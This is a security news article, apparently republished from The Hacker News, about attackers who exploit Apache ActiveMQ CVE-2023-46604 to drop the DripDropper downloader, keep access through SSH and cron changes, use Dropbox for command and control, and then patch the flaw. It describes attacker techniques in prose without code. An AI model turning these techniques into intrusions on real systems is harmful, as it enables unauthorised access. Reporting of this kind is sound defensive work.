Two-Years-Old Vulnerability
Threat actors are actively exploiting a nearly two-year-old security flaw in Apache ActiveMQ to gain persistent access to cloud Linux systems and deploy malware known as DripDropper.
In an unusual twist, however, observers have noted that the unknown attackers are patching the exploited vulnerability after securing initial access. This proactive measure aims to prevent further exploitation by other adversaries and evade detection, as reported by Red Canary in a document shared with The Hacker News.
“Follow-on adversary command-and-control (C2) tools varied by endpoint and included Sliver and Cloudflare Tunnels, which help maintain covert command and control over the long term,” researchers Christina Johns, Chris Brook, and Tyler Edmonds stated.
The attacks exploit a maximum-severity security flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0). This remote code execution vulnerability allows attackers to run arbitrary shell commands and the team addressed it in late October 2023.
Since then, the security defect has come under heavy exploitation, with multiple threat actors leveraging it to deploy a wide range of payloads, including HelloKitty ransomware, Linux rootkits, GoTitan botnet malware, and Godzilla web shell.
DripDropper
In the attack activity detected by Red Canary, the threat actors have leveraged their access to modify existing sshd configurations, enabling root login. This modification grants them elevated access to drop a previously unknown downloader dubbed DripDropper.
DripDropper, a PyInstaller Executable and Linkable Format (ELF) binary, requires a password to run, thereby resisting analysis. Additionally, it communicates with an attacker-controlled Dropbox account, illustrating how threat actors increasingly rely on legitimate services to blend in with regular network activity and sidestep detection.
Ultimately, the Downloader serves as a conduit for two files. One file facilitates a varied set of actions on different endpoints, ranging from process monitoring to contacting Dropbox for further instructions. The Persistence of the dropped file is Achieved by Modifying the 0anacron file present in the /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly directories.
The second file dropped by DripDropper also contacts Dropbox to receive commands while Altering existing Configuration files related to SSH. This likely serves as a backup mechanism for Persistent access. The final stage entails the Attacker Downloading patches for CVE-2023-46604 from Apache Maven, effectively Plugging the flaw.
“Patching the vulnerability does not disrupt their operations, as they have already established other persistence mechanisms for continued access,” the researchers noted.
While certainly rare, this technique is not new. Last month, France’s national Cybersecurity agency ANSSI detailed a China-nexus initial access broker Employing the same approach to secure access to systems. This strategy prevents other threat actors from Exploiting the Vulnerabilities and masks the initial access vector used in the first place.
This campaign serves as a timely reminder of why organizations need to apply patches Promptly, limit access to internal services by Configuring ingress rules to trusted IP addresses or VPNs, and monitor logging for cloud environments to flag Anomalous activity.
Source: TheHackerNews
Read more at Impreza News
